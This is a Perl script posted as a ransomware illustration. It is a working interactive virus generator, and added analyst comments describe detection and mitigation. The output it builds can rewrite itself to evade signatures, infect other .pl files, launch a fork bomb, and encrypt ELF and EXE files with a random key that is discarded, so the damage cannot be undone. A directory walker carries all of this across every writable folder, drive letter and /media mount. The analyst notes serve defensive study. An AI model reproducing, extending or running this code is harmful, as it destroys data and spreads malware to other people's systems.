@vbhs vbhs/Rensomware.pl
Created Jan 25, 2018

This script illustrates how ransomware works, using the Perl programming language.
#!/usr/bin/perl
# Perl Virus Generator
####### Strings
# Banner printed by the generator's interactive prompts. Each ask* sub appends
# one line describing the chosen option to this string, so by the end it is a
# summary of everything that was compiled into the generated script.
$header = <<'HEADER' ;
###################################################
############## Perl Virus Generator ###############
################## by 0BtemOs Touhami##############
###################################################
While generating, you will be asked a few questions
y = YES, n = NO
###################################################
HEADER
# Skeleton of the generated script: a shebang, an attribution comment, the
# @case alphabet used for random strings, and the opening of a wrapper sub.
# The driver at the bottom of this file appends the optional fragments to
# $code and finishes with $codeB, so they all land inside that sub body.
# Analyst note: the attribution comment and the trailer comment in $codeB are
# constant text that is not in the rename lists used elsewhere in this file.
$code = << 'CODE' ;
#!/usr/bin/perl
# generated by 0BtemOs Touhami [Touhami Kasbaoui]
@case = ("A".."Z","a".."z","0".."9"); # for rand Strings
&0btouvb ( ) ;
sub 0btouvb
{
CODE
# Closing brace for the wrapper sub opened in $code, plus a trailer comment.
$codeB = "}\n# This is the end, my friend\n" ;
# Optional fragment (selected by askPoly). In the generated script it reads
# the script's own file ($0), replaces every name listed in @change with a
# freshly generated 5-character string, and writes the result back to $0.
# Analyst note: because the file on disk is rewritten on each run, a hash of
# one copy or a signature keyed on these identifier names will not match the
# next copy; the self-read followed by a self-write of $0 is the stable
# behaviour to look for.
$polyC = << 'polyC' ;
&varChange ( ) ;
sub varChange # Polymorphism through varchanging
{ # for rand Strings
@change = ("0btouvb", "perlInfect", "case", "call", "file", "newdata", "target", "isInfected", "data", "dirs", "varChange", "varib", "count", "myself", "line", "day" , "dayMonth" ,"dayOfWeek", "webInfect", "payloadText", "web");
@varib;
for ($count = 0;$count < scalar(@change); $count++)
{
$varib[$count] = $case[int(rand(52))].$case[int(rand(62))].$case[int(rand(62))].$case[int(rand(62))].$case[int(rand(62))];
}
open(0btouvb, "<", "$0");
@0btouvb = <0btouvb>;
close(0btouvb);
open(0btouvb, ">", "$0");
foreach $line (@0btouvb)
{
for($count = 0; $count < scalar(@change); $count++)
{
while ($line =~ /$change[$count]/)
{
$line =~ s/$change[$count]/$varib[$count]/;
}
}
print 0btouvb $line;
}
close(0btouvb);
}
polyC
# Optional fragment (selected by askInfect). In the generated script it loops
# over the *.pl files in the current directory and, for each file that
# isInfected() reports as 0, rewrites that file with a call line inserted
# after the first line and code from the running script appended under a
# randomly named sub.
# isInfected() reads the target's first line and tests it against a
# whitespace pattern; the in-line comment describes the marker as a run of
# spaces on the first line (the exact pattern may have lost whitespace in
# this listing -- confirm against the raw file).
# Analyst note: the visible effect is an unexpected modification of existing
# .pl files -- a new second line calling a 5-character sub and a new sub of
# that name appended at the end. File-integrity monitoring or a
# version-control diff of script directories surfaces this directly.
$infectC = << 'infectC' ;
&perlInfect ( ) ;
sub perlInfect { # Infect Perl Files
$call = $case[int(rand(52))].$case[int(rand(62))].$case[int(rand(62))].$case[int(rand(62))].$case[int(rand(62))];
foreach $pl ( glob("*.pl") ) {
if ( isInfected($pl) == 0) {
open(me, $0);
open(target, "<", "$pl");
$_ = <target>;
@first = split('\n', $_);
$_ = <target>;
$new = $1 . $first[0] . " \n\&$call\(\)\n" . $_; # Set infectionmark
while ( <target> ) { $new = $new . $_; }
seek(me, 0, 0);
while ( <me> ne "sub viri\{\n" ) { };
$new = $new . "\nsub $call\{\n";
while ( <me> ) { $new = $new . $_; }
close(target);
open(target, ">", $pl);
print target $new;
close(target);
close(me);
}
}
}
sub isInfected{ # Check for infection ( Infectionmark == 15 x space in the first line )
$file = $_[0];
open(pl, "<", $file);
@perl = <pl>;
close(pl);
return $perl[0] =~ / /;
}
infectC
# Optional fragment (selected by askCrypt). In the generated script it loads
# Crypt::CBC, walks every entry in the current directory, and targets writable
# files whose first line contains "ELF" or whose name matches /\.exe?/; the
# selected file is overwritten in place with the cipher output.
# Analyst note: the key is a random string held only in $key. Nothing in this
# fragment stores, displays or transmits it, so as written there is no
# recovery path for an affected file -- treat the effect as destructive and
# plan recovery around backups rather than decryption.
# The dependency on Crypt::CBC (a CPAN module, not core Perl) is also a
# precondition: the fragment cannot load on hosts where it is not installed.
$cryptC = << 'cryptC' ;
use Crypt::CBC ;
&encrypt ( ) ;
sub encrypt # encrypt every ELF or *.exe file with a random key
{
foreach $file ( glob ( "*" ) )
{
open ( file, "<", "$file" ) ;
@data = <file> ;
close ( file ) ;
if ( ($data[0] =~ /ELF/ || $file =~ /\.exe?/) && -w $file )
{
$key = "" ;
for ( $i = 1; $i < int ( rand (20) ) + 2; $i ++ )
{
$key .= $case[int ( rand (62) )] ;
}
$crypt = Crypt::CBC -> new ( -key => $key, -crypher => 'Twofish' ) ;
$crypt -> start ( 'encrypting' ) ;
open ( F, "$file" ) ;
while ( read ( F, $buffer, 1024 ) )
{
$enc .= $crypt -> crypt ( $buffer ) ;
}
$enc .= $crypt -> finish ;
open ( file , ">", "$file" ) ;
print file $enc ;
close ( file ) ;
}
}
}
cryptC
# Optional fragment (selected by askFork): a process-spawning loop.
# Analyst note: per-user process limits (e.g. an nproc/ulimit cap) bound the
# impact of this kind of resource exhaustion.
$forkC = "fork while fork\n" ;
# Directory walker, split in two halves. $rekInfectA deliberately ends inside
# an open block: the driver appends the per-directory calls returned by
# askFoldInfect / askFoldCrypt after it, then $rekInfectB closes the blocks.
# The walker changes to the top of the filesystem via a long "../" chain and
# recurses into every entry that is a readable and writable directory.
# Analyst note: reach is bounded by the permissions of the account running the
# script -- only directories that account can read and write are entered --
# so running untrusted scripts under a low-privilege account limits exposure.
$rekInfectA = << 'rekInfectA' ;
&foldInfect ( ) ;
sub foldInfect
{
chdir('../../../../../../../../../../..'); # run Payload through every folder
foreach $dirs ( <*> )
{
if ((-r $dirs) && (-w $dirs) && (-d $dirs))
{
chdir($dirs);
rekInfectA
# Second half of the walker: recurse, step back up, then branch on $^O.
# On a "Win" match it tries each drive letter A..Z; on a "linux" match it
# descends into /media. Removable and secondary volumes mounted and writable
# at the time are therefore in scope as well as the local tree.
$rekInfectB = << 'rekInfectB' ;
&foldInfect();
chdir('..');
}
}
if ($^O =~ "Win") # If OS == Win
{
foreach (A..Z) # infect USB and other partitions on Win & Linux
{
if ( chdir($_.'://') ) # Infect every device
{
chdir($_.'://');
&foldInfect();
}
}
}
if ($^O =~ "linux") # If OS == Linux
{
chdir('/media'); # Infect every device
&foldInfect();
}
}
rekInfectB
####### End Strings
####### Functions
# Prompt for the self-rewriting option.
# Returns the $polyC fragment on "y" and the empty string on "n". Any other
# answer re-prompts by recursion; the recursive call is the last statement
# evaluated, so its value becomes this sub's return value.
# Side effects: redraws the banner, appends the decision to the global
# $header, and stores the answer in the package global $a.
sub askPoly
{
&header ( ) ;
print "Should your virus be polymorph?\n" ;
$a = <STDIN> ;
chomp ( $a ) ;
if ( $a eq "y" )
{
$header .= "Your virus will be polymorph\n" ;
&header ( ) ;
return $polyC ;
}
elsif ( $a eq "n" )
{
$header .= "Your virus won't be polymorph\n" ;
&header ( ) ;
return "" ;
}
else
{
&askPoly ( ) ;
}
}
# Prompt for the option that modifies other Perl files.
# Returns 1 on "y" and 0 on "n"; any other answer re-prompts by recursion.
# The driver uses the flag to decide whether $infectC and the directory
# walker are appended to the generated text.
# Side effects: redraws the banner, appends the decision to the global
# $header, and stores the answer in the package global $a.
sub askInfect
{
&header ( ) ;
print "Should your virus infect other perl files?\n" ;
$a = <STDIN> ;
chomp ( $a ) ;
if ( $a eq "y" )
{
$header .= "Your virus will infect other perl files\n" ;
&header ( ) ;
return 1 ;
}
elsif ( $a eq "n" )
{
$header .= "Your virus won't infect other perl files\n" ;
&header ( ) ;
return 0 ;
}
else
{
&askInfect ( ) ;
}
}
# Prompt for the process-spawning option.
# Returns the $forkC fragment on "y" and the empty string on "n"; any other
# answer re-prompts by recursion.
# Side effects: redraws the banner, appends the decision to the global
# $header, and stores the answer in the package global $a.
sub askFork
{
&header ( ) ;
print "Should your virus be a forkbomb?\n" ;
$a = <STDIN> ;
chomp ( $a ) ;
if ( $a eq "y" )
{
$header .= "Your virus will be a forkbomb\n" ;
&header ( ) ;
return $forkC ;
}
elsif ( $a eq "n" )
{
$header .= "Your virus won't be a forkbomb\n" ;
&header ( ) ;
return "" ;
}
else
{
&askFork ( ) ;
}
}
# Prompt for the file-encryption option.
# Returns 1 on "y" and 0 on "n"; any other answer re-prompts by recursion.
# The driver uses the flag to decide whether $cryptC and the directory
# walker are appended to the generated text.
# Side effects: redraws the banner, appends the decision to the global
# $header, and stores the answer in the package global $a.
sub askCrypt
{
&header ( ) ;
print "Should your virus encrypt ELF and EXE files?\n" ;
$a = <STDIN> ;
chomp ( $a ) ;
if ( $a eq "y" )
{
$header .= "Your virus will encrypt ELF and EXE files\n" ;
&header ( ) ;
return 1 ;
}
elsif ( $a eq "n" )
{
$header .= "Your virus won't encrypt ELF and EXE files\n" ;
&header ( ) ;
return 0 ;
}
else
{
&askCrypt ( ) ;
}
}
# Prompt for the scope of the file-modifying option.
# On "y" returns one line of source text (a call to perlInfect) that the
# driver splices between $rekInfectA and $rekInfectB, i.e. inside the
# per-directory loop of the walker. On "n" returns the empty string, so the
# walker body contains no such call. Any other answer re-prompts by recursion.
# Side effects: redraws the banner, appends the decision to the global
# $header, and stores the answer in the package global $a.
sub askFoldInfect
{
&header ( ) ;
print "Should your virus infect in every directory (y) or just in the current (n)?\n" ;
$a = <STDIN> ;
chomp ( $a ) ;
if ( $a eq "y" )
{
$header .= "Your virus will infect every directory\n" ;
&header ( ) ;
return "&perlInfect ( ) ;\n" ;
}
elsif ( $a eq "n" )
{
$header .= "Your virus will only infect the current directory\n" ;
&header ( ) ;
return "" ;
}
else
{
&askFoldInfect ( ) ;
}
}
# Prompt for the scope of the file-encryption option.
# On "y" returns one line of source text (a call to encrypt) that the driver
# splices between $rekInfectA and $rekInfectB, i.e. inside the per-directory
# loop of the walker. On "n" returns the empty string. Any other answer
# re-prompts by recursion.
# Side effects: redraws the banner, appends the decision to the global
# $header, and stores the answer in the package global $a.
sub askFoldCrypt
{
&header ( ) ;
print "Should your virus crypt files in every directory (y) or just in the current (n)?\n" ;
$a = <STDIN> ;
chomp ( $a ) ;
if ( $a eq "y" )
{
$header .= "Your virus will crypt files in every directory\n" ;
&header ( ) ;
return "&encrypt ( ) ;\n" ;
}
elsif ( $a eq "n" )
{
$header .= "Your virus will only crypt files in the current directory\n" ;
&header ( ) ;
return "" ;
}
else
{
&askFoldCrypt ( ) ;
}
}
# Prompt for the output file name.
# Returns the typed text with ".pl" appended; an empty answer re-prompts by
# recursion. The text is used as typed -- no character or path checks are
# applied here -- and the driver passes the result straight to open() for
# writing, so an existing file of that name is overwritten.
# Side effects: redraws the banner, appends the chosen name to the global
# $header, and stores the answer in the package global $a.
sub askFileName
{
&header ( ) ;
print "Type the filename of your virus (without \".pl\")!\n" ;
$a = <STDIN> ;
chomp ( $a ) ;
if ( $a ne "" )
{
$header .= "Your virus will be called " . $a . ".pl\n" ;
&header ;
return $a . ".pl" ;
}
else
{
&askFileName ( ) ;
}
}
# Prompt for build-time identifier renaming.
# Returns 1 on "y" and 0 on "n"; any other answer re-prompts by recursion.
# When 1, the driver calls poly() on the file it has just written.
# Side effects: redraws the banner, appends the decision to the global
# $header, and stores the answer in the package global $a.
sub askVarchange
{
&header ( ) ;
print "Should the VarNames be changed, before creating the virus?\n" ;
$a = <STDIN> ;
chomp ( $a ) ;
if ( $a eq "y" )
{
$header .= "The VarNames will be changed\n" ;
&header ( ) ;
return 1 ;
}
elsif ( $a eq "n" )
{
$header .= "The VarNames won't be changed\n" ;
&header ( ) ;
return 0 ;
}
else
{
&askVarchange ( ) ;
}
}
# Build-time counterpart of the varChange fragment in $polyC: operates on the
# freshly written output file (global $filename) instead of $0.
# Reads the whole file, replaces each name listed in @change with a random
# 5-character string drawn from @case, and writes the lines back.
# Takes no arguments and returns nothing meaningful; works entirely through
# package globals. The open() calls are not checked for failure.
# Analyst note: every build that uses this step carries different sub and
# variable names, so those names are poor indicators; text outside the
# @change list (comments, string literals, overall structure) is unaffected
# by this step.
sub poly
{
@case = ("A".."Z","a".."z","0".."9"); # for rand Strings
@change = ("0btouvb", "perlInfect", "case", "call", "file", "newdata", "target", "isInfected", "data", "dirs", "varChange", "varib", "count", "myself", "line", "day" , "dayMonth" ,"dayOfWeek", "webInfect", "payloadText", "web"); # Vars to change
@varib;
for ($count = 0;$count < scalar(@change); $count++)
{
$varib[$count] = $case[int(rand(52))].$case[int(rand(62))].$case[int(rand(62))].$case[int(rand(62))].$case[int(rand(62))];
}
open(0btouvb, "<", "$filename");
@0btouvb = <0btouvb>;
close(0btouvb);
open(0btouvb, ">", "$filename");
foreach $line (@0btouvb)
{
for($count = 0; $count < scalar(@change); $count++)
{
while ($line =~ /$change[$count]/)
{
$line =~ s/$change[$count]/$varib[$count]/;
}
}
print 0btouvb $line;
}
close(0btouvb);
}
# Clears the terminal by handing both `clear` and `cls` to system().
# The command names are barewords, which Perl accepts as strings only because
# this file does not enable `use strict`. Return values are not checked;
# presumably whichever command does not exist on the platform simply fails.
sub clear
{
system ( clear ) ;
system ( cls ) ;
}
# Redraws the screen: clears the terminal, then prints the global $header
# (banner plus the option summary accumulated so far).
sub header
{
clear ( ) ;
print $header ;
}
####### End Functions
# ---- Generator driver ----
# Assembles the output text by appending the selected fragments to $code in a
# fixed order, writes it to the chosen file, and optionally renames
# identifiers in that file. Nothing here sets permissions on the output or
# executes it; the result is plain Perl source on disk.
print $header ;
# Self-rewriting fragment, or "" when declined.
$code .= &askPoly ( ) ;
$aInfect = &askInfect ( ) ;
if ( $aInfect == 1 ) { $code .= $infectC ; }
# Process-spawning fragment, or "" when declined.
$code .= &askFork ( ) ;
$aCrypt = &askCrypt ( ) ;
if ( $aCrypt == 1 ) { $code .= $cryptC ; }
# The directory walker is included only when at least one file-touching
# option is on; the per-directory calls are spliced between its two halves.
if ( $aInfect == 1 || $aCrypt == 1 )
{
$code .= $rekInfectA ;
if ( $aInfect == 1 ) { $code .= &askFoldInfect ( ) ; }
if ( $aCrypt == 1 ) { $code .= &askFoldCrypt ( ) ; }
$code .= $rekInfectB ;
}
# Close the wrapper sub opened by the $code skeleton.
$code .= $codeB ;
$filename = &askFileName ( ) ;
# Write the assembled text; open() is not checked, so a failure to create the
# file is silent.
open ( file, ">", "$filename" ) ;
print file $code ;
close file ;
# Optional build-time identifier renaming of the file just written.
if ( &askVarchange ( ) == 1 )
{
&poly ( ) ;
}